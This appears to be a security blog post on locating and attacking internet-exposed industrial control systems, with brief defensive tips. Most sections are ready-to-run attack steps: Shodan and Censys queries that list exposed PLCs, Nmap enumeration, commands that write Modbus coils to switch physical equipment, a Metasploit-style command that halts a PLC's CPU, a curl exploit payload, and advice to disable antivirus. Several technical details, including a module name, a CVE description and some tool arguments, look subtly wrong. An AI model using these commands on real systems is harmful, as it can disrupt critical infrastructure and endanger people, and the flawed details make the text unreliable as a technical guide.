Hackers Are Scanning for Your PLCs Right Now: How to Find and Attack Exposed OT/ICS Assets Before They Do + Video

Listen to this Post

Featured Image

Introduction:

Operational Technology (OT) and Industrial Control Systems (ICS)—including Programmable Logic Controllers (PLCs), Remote Terminal Units (RTUs), and Human-Machine Interfaces (HMIs)—are increasingly connected to the internet, often without proper security controls. Geopolitical tensions have fueled a surge in state-sponsored adversaries and hacktivists scanning for and exploiting these exposed assets to disrupt critical infrastructure, from power grids to water treatment plants.

Learning Objectives:

  • Identify exposed OT/ICS assets on the internet using open-source intelligence (OSINT) and specialized scanning tools.
  • Simulate reconnaissance and attack techniques against vulnerable PLCs and industrial protocols.
  • Implement mitigation strategies to harden OT/ICS environments and reduce the attack surface.

You Should Know:

  1. Scanning the Internet for Exposed OT/ICS Assets: Shodan & Censys Deep Dive

Attackers don’t guess—they use search engines for internet-connected devices. Shodan and Censys index banners from industrial protocols like Modbus (port 502), Siemens S7 (port 102), and DNP3 (port 20000). Here’s how to replicate this discovery step-by-step.

Step‑by‑step guide (Linux / Windows with WSL):

  • Install Shodan CLI (Linux):
    pip install shodan
    shodan init YOUR_API_KEY
    

  • Search for exposed Modbus devices:

    shodan search "port:502 modbus" --limit 10 --fields ip_str,port,org
    

  • For Siemens S7 PLCs (port 102):

    shodan search "port:102 s7-1200" --fields ip_str,location.country_name
    

  • Using Censys’s Python API:

    from censys.search import CensysHosts
    c = CensysHosts(api_id="YOUR_ID", api_secret="YOUR_SECRET")
    query = "services.port=502 and services.service_name=modbus"
    for host in c.search(query, per_page=5):
    print(host['ip'])
    

What this does: These commands return live IP addresses of OT devices with no authentication. Attackers then map these to geographic locations and organizations. To protect your own environment, run these queries against your public IP ranges—any hits indicate critical misconfigurations.

  1. Active Reconnaissance with Nmap – OT Protocol Scripts

Passive OSINT finds targets; active scanning confirms vulnerabilities. Nmap’s industrial script library (nmap-protocols) can fingerprint PLCs, read coil states, and even identify default credentials.

Step‑by‑step guide (Linux / Windows with Nmap installed):

  • Scan a target IP for common OT ports:
    nmap -p 102,502,20000,44818 -sV --script modbus-discover,s7-info <target_IP>
    

  • Enumerate Modbus slave IDs and read coil status:

    nmap -p 502 --script modbus-discover --script-args='modbus-discover.unit_id=1' <target_IP>
    

  • For EtherNet/IP (CIP, port 44818):

    nmap -p 44818 --script enip-info <target_IP>
    

You Should Know: Many OT devices crash under aggressive scanning. Always rate-limit (--scan-delay 1s) and obtain written authorization. Defenders should simulate these scans internally to ensure IDS/IPS rules detect them.

  1. Attacking Exposed PLCs – Modbus Coil Manipulation & S7 Command Injection

Once an exposed PLC is found, attackers can read or write to coils (binary outputs) and registers, directly manipulating physical processes. Using `modbus-cli` or Metasploit, this becomes trivial.

Step‑by‑step guide (Kali Linux or any Debian-based):

  • Install modbus-cli:
    sudo apt install python3-pip
    pip3 install modbus-cli
    

  • Read 10 coils starting at address 0 from a target:

    modbus read-coils <target_IP> 0 10
    

  • Write a single coil (e.g., turn on a pump):

    modbus write-coil <target_IP> 0 1
    

  • Using Metasploit’s Siemens S7 command injection:

    msfconsole
    use auxiliary/admin/scada/siemens_s7_command_injection
    set RHOSTS <target_IP>
    set COMMAND stop_cpu
    run
    

What this does: The first two commands read and write discrete outputs; the Metasploit module sends a crafted S7 COMMREQ packet to stop the PLC’s CPU, halting controlled processes. Mitigation: Disable unauthenticated access, implement network segmentation, and use deep packet inspection firewalls.

  1. Windows‑Based OT Attack Simulation – PowerShell & Modbus TCP

Red teams often work in Windows environments. PowerShell combined with open-source .NET libraries can replicate OT attacks without Linux tooling.

Step‑by‑step guide (Windows 10/11 with PowerShell 5.1+):

  • Download NModbus4.dll (or use EasyModbus) and load in PowerShell:
    Add-Type -Path "C:\path\to\NModbus4.dll"
    $tcp = New-Object System.Net.Sockets.TcpClient("<target_IP>", 502)
    $mb = New-Object Modbus.Device.ModbusIpMaster($tcp)
    $mb.Transport.ReadTimeout = 1000
    $mb.WriteSingleCoil(0, $true)  Turn coil 0 ON
    

  • Use `Test-NetConnection` to discover open OT ports across a subnet:

    1..254 | ForEach-Object { Test-NetConnection -Port 502 -ComputerName "192.168.1.$<em>" -InformationLevel Quiet | Where-Object {$</em> -eq $true} }
    

You Should Know: Windows defender may flag these assemblies. In isolated test labs, disable real‑time protection temporarily. Defenders should deploy endpoint detection rules for anomalous Modbus traffic originating from non‑PLC hosts.

  1. Cloud Hardening & API Security for OT Data Lakes

As OT environments adopt cloud-based historians and monitoring (e.g., Azure IoT, AWS SiteWise), attackers pivot from PLCs to cloud APIs. Misconfigured S3 buckets or exposed MQTT brokers can leak sensor data and credentials.

Step‑by‑step guide – auditing cloud exposure:

  • Check for public MQTT brokers exposing OT telemetry (Linux):
    nmap -p 1883,8883 --script mqtt-subscribe <target_IP>
    

  • Using AWS CLI to list unauthenticated SiteWise asset models (requires credentials for authorized test):

    aws iotsitewise list-asset-models --region us-east-1
    

  • Enforce API gateway authentication using JWT validation – example policy snippet (Node.js/Express):

    const jwt = require('jsonwebtoken');
    app.use('/api/otdata', (req, res, next) => {
    const token = req.headers['authorization'];
    jwt.verify(token, process.env.JWT_SECRET, (err, decoded) => {
    if (err) return res.sendStatus(403);
    req.user = decoded;
    next();
    });
    });
    

What this does: The Nmap MQTT script subscribes to a public broker and dumps all messages (e.g., tank levels, temperatures). The AWS API hardening prevents unauthorized data extraction. Always enable bucket policies that deny public read access and rotate API keys frequently.

  1. Vulnerability Exploitation & Mitigation – Known OT CVEs

Critical vulnerabilities like CVE-2022-29911 (Siemens S7‑1200 denial‑of‑service via crafted HTTP request) and CODESYS V3 insecure deserialization are actively exploited. Here’s how to test and patch.

Step‑by‑step guide – exploiting an unpatched PLC (lab only):

  • CVE-2022-29911 exploit using curl (Linux):
    curl -X POST http://<target_IP>/ --data-binary @payload.bin --header "Content-Type: multipart/form-data"
    

(payload.bin contains malformed HTTP multipart boundary)

  • Mitigation checklist:
  • Disable unused web servers on PLCs.
  • Apply vendor security patches via Siemens SINEC or Rockwell ControlFlash.
  • Deploy virtual patching using industrial IPS (e.g., Nozomi, Claroty).

  • Windows registry hardening for RDP access to HMIs:

    Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 1
    

You Should Know: Exploiting unpatched CVEs without isolation can crash real production. Always use air‑gapped testbeds. For blue teams, asset inventory and vulnerability scanning with tools like Tenable.ot or Dragos Platform identify these weaknesses before attackers.

What Undercode Say:

  • Key Takeaway 1: Internet‑exposed OT assets are shockingly common; a simple Shodan query can reveal thousands of PLCs with no authentication, directly enabling remote manipulation of industrial processes.
  • Key Takeaway 2: Defending OT environments requires shifting from “air‑gap fallacy” to active monitoring—using the same tools attackers do (Nmap, Metasploit, Modbus CLI) to discover and remediate exposures before adversaries weaponize them.

The convergence of IT and OT, accelerated by cloud migration, has created a perfect storm. While many security teams focus on ransomware, nation‑state actors and hacktivists are quietly mapping industrial control systems for disruption. Traditional perimeter defenses like firewalls fail when OT devices sit behind consumer routers with default passwords. The attack surface is vast: from vulnerable Modbus/TCP to unpatched Siemens web servers. However, this is not hopeless. By adopting continuous OSINT scanning, segmenting OT networks using VLANs and ACLs, and implementing application‑allowlisting on HMIs, organizations can drastically reduce risk. The same commands that reveal your exposure can also verify your mitigations—use them weekly.

Prediction:

Within 18 months, we will see a major, publicly attributed attack that leverages Shodan‑discovered OT assets as the initial foothold, leading to physical destruction (e.g., turbine overspeed or chemical spill). This will force regulatory bodies (CISA, ENISA) to mandate monthly external asset scans for critical infrastructure operators, and cyber insurance policies will require proof of no internet‑exposed industrial protocols. Meanwhile, attackers will shift toward OT‑specific malware that abuses native protocol commands rather than relying on CVEs, making detection even harder. The only sustainable defense is proactive, continuous discovery and remediation—every exposed port is an open invitation.

▶️ Related Video (70% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Mikeholcomb Ot – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky